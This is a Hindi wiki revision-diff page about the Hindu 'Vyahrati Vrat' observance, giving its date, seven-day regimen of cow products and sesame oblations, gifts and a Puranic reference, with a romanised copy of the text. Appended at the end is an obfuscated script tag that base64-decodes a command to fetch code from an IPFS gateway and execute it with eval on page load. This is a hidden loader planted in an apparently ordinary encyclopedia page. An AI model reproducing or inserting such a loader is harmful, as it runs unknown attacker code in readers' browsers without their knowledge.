Difference between revisions of "व्याह्रति व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (व्याह्रतिव्रत का नाम बदलकर व्याह्रति व्रत कर दिया गया है)
m (Text replace - ")</ref" to "</ref")
 
(8 intermediate revisions by 5 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[चैत्र]] [[शुक्ल पक्ष]] की [[प्रतिपदा]] से व्याह्रतिव्रत आरम्भ होता है।
 
*[[चैत्र]] [[शुक्ल पक्ष]] की [[प्रतिपदा]] से व्याह्रतिव्रत आरम्भ होता है।
*किसी बड़ी नदी में स्नान के उपरान्त सात दिनों तक [[गौमूत्र]], [[गोबर]], [[दूध]], [[दही]], [[घृत]], [[कुश]] युक्त [[जल]] का क्रम से पान एवं अन्त में (सातवें दिन) उपवास करना चाहिए।
+
*किसी बड़ी नदी में स्नान के उपरान्त सात दिनों तक गौमूत्र, गोबर, [[दूध]], [[दही]], [[घृत]], [[कुश]] युक्त [[जल]] का क्रम से पान एवं अन्त में (सातवें दिन) उपवास करना चाहिए।
 
*प्रतिदिन महाव्याह्रतियों (भू:, भुव:, स्व:, मह:, जन:, तप:, एवं सत्यम्) के साथ [[तिल]] से होम करना चाहिए।
 
*प्रतिदिन महाव्याह्रतियों (भू:, भुव:, स्व:, मह:, जन:, तप:, एवं सत्यम्) के साथ [[तिल]] से होम करना चाहिए।
 
*व्याह्रतिव्रत एक वर्ष तक प्रतिमास रखना चाहिए।
 
*व्याह्रतिव्रत एक वर्ष तक प्रतिमास रखना चाहिए।
 
*अन्त में दक्षिणा नवीन [[वस्त्र]], [[सोना]], [[पीतल]] के पात्र, दुधारू [[गाय]] का दान करना चाहिए।
 
*अन्त में दक्षिणा नवीन [[वस्त्र]], [[सोना]], [[पीतल]] के पात्र, दुधारू [[गाय]] का दान करना चाहिए।
*व्याह्रतिव्रत से कर्ता सम्राट हो जाता है। <ref>विष्णुधर्मोत्तरपुराण (3|162|1-7)</ref>
+
*व्याह्रतिव्रत से कर्ता सम्राट हो जाता है।<ref>विष्णुधर्मोत्तरपुराण (3|162|1-7</ref>
*व्याह्रतियों एवं महाव्याह्तियों के लिए धर्मशास्त्र का इतिहास 4 <ref>पृ0 301, टिप्पणी 713</ref> में इस महाग्रन्थ का मूल खण्ड 2 में वर्णन है।  
+
*व्याह्रतियों एवं महाव्याह्तियों के लिए धर्मशास्त्र<ref>धर्मशास्त्र का इतिहास 4 पृ0 301, टिप्पणी 713, मूल खण्ड 2</ref> में इस महाग्रन्थ का वर्णन है।  
  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
==संबंधित लिंक==
+
==संबंधित लेख==
 
{{पर्व और त्योहार}}
 
{{पर्व और त्योहार}}
 
{{व्रत और उत्सव}}
 
{{व्रत और उत्सव}}

Latest revision as of 12:51, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • chaitr shukl paksh ki pratipada se vyahrativrat arambh hota hai.
  • kisi b di nadi mean snan ke uparant sat dinoan tak gaumootr, gobar, doodh, dahi, ghrit, kush yukt jal ka kram se pan evan ant mean (satavean din) upavas karana chahie.
  • pratidin mahavyahratiyoan (bhoo:, bhuv:, sv:, mah:, jan:, tap:, evan satyamh) ke sath til se hom karana chahie.
  • vyahrativrat ek varsh tak pratimas rakhana chahie.
  • ant mean dakshina navin vastr, sona, pital ke patr, dudharoo gay ka dan karana chahie.
  • vyahrativrat se karta samrat ho jata hai.[1]
  • vyahratiyoan evan mahavyahtiyoan ke lie dharmashastr[2] mean is mahagranth ka varnan hai.


tika tippani aur sandarbh

  1. vishnudharmottarapuran (3|162|1-7
  2. dharmashastr ka itihas 4 pri0 301, tippani 713, mool khand 2

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>